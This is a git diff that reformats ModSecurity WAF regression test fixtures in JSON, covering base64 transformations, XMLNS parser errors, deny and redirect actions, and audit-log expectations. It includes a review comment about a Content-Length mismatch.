"Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste no-cache", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste no-cache", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste %{REQUEST_HEADERS:Pragma}%',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/action-tnf-base64.json b/test/test-cases/regression/action-tnf-base64.json index 157ddde3c7..d43f380d9d 100644 --- a/test/test-cases/regression/action-tnf-base64.json +++ b/test/test-cases/regression/action-tnf-base64.json 
@@ -1,88 +1,90 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log": "t:base64encode: \"dmFsdWUy\"" + "expected": { + "debug_log": "t:base64encode: \"dmFsdWUy\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64encode,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=dmFsdWUy¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": "t:base64decode: \"value2\"" + "expected": { + "debug_log": "t:base64decode: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64decode,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-xmlns.json b/test/test-cases/regression/action-xmlns.json index df612f20c3..f2c1f56c53 100644 --- a/test/test-cases/regression/action-xmlns.json +++ b/test/test-cases/regression/action-xmlns.json 
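Review bot: In the "base64 (2/2)" case the unchanged `"Content-Length": "27"` does not describe the body it is sent with. Assuming the body line reads `param1=dmFsdWUy&param2=value2` (this page renders the `&para` sequence as a pilcrow), it is 29 bytes, whereas the (1/2) body is the 27 bytes its header claims. Since the harness no longer appends a newline to each body line, the declared length and the fixture bytes can agree exactly, so I would set `"Content-Length": "29"` here unless the mismatch is deliberate. Both titles on the new side also keep the typo `Testing Transformatio`, which is worth correcting while these lines are being rewritten.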
@@ -1,108 +1,195 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 1)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 1)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Bad format, missing equals sign" }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap'http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 2)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 2)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: XMLNS is invalid. Expecting a name=value format." 
}, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:=\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 3)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 3)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Missing xmlns href for prefix: `schemas.xmlsoap.org/soap/envelope/'." }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap='schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing XML request body parser (validate ok)", - "expected":{ - "debug_log": "Target value: \"39.95\" \\(Variable: XML:\/bookstore\/book\/price\\[text\\(\\)\\]\\)" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + { + "enabled": 1, + "version_min": 300000, + "title": "Testing XML request body parser (validate ok)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": 
"/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: \"39.95\" \\(Variable: XML:/bookstore/book/price\\[text\\(\\)\\]\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/actions.json b/test/test-cases/regression/actions.json index c69f1a7cb0..fe00e9a39c 100644 --- a/test/test-cases/regression/actions.json +++ b/test/test-cases/regression/actions.json 
@@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -26,31 +26,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -59,7 +59,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -75,8 +75,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -86,31 +86,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 302, "redirect_url": "http://www.google.com" }, @@ -119,7 +119,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -135,8 +135,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -146,31 +146,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 306, "redirect_url": "http://www.google.com" }, @@ -179,7 +179,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,status:306,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -195,8 +195,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -206,31 +206,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ @@ -238,7 +238,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny,status:500\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -254,8 +254,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -265,31 +265,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ 
@@ -313,8 +313,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -324,31 +324,31 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ diff --git a/test/test-cases/regression/auditlog.json b/test/test-cases/regression/auditlog.json index a04867ef49..eacaeeb5f8 100644 --- a/test/test-cases/regression/auditlog.json +++ b/test/test-cases/regression/auditlog.json 
@@ -15,8 +15,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,23 +25,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -72,8 +72,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -82,23 +82,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -130,8 +130,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -140,23 +140,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -188,8 +188,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -198,14 +198,16 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -213,8 +215,6 @@ }, "expected": { "audit_log": "{\"transaction\":{\"client_ip\":\"200.249.12.31\",\"time_stamp\":\"\\S{3} \\S{3} [ \\d]\\d \\d{2}:\\d{2}:\\d{2} \\d{4}\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -247,8 +247,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -257,14 +257,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=test2", + "uri": "/test.pl?param1=test¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "id \"1556", - "error_log": "", "http_code": 403 }, "rules": [ @@ -296,8 +305,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -306,14 +315,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=tEst2", + "uri": "/test.pl?param1=test¶m2=tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ 
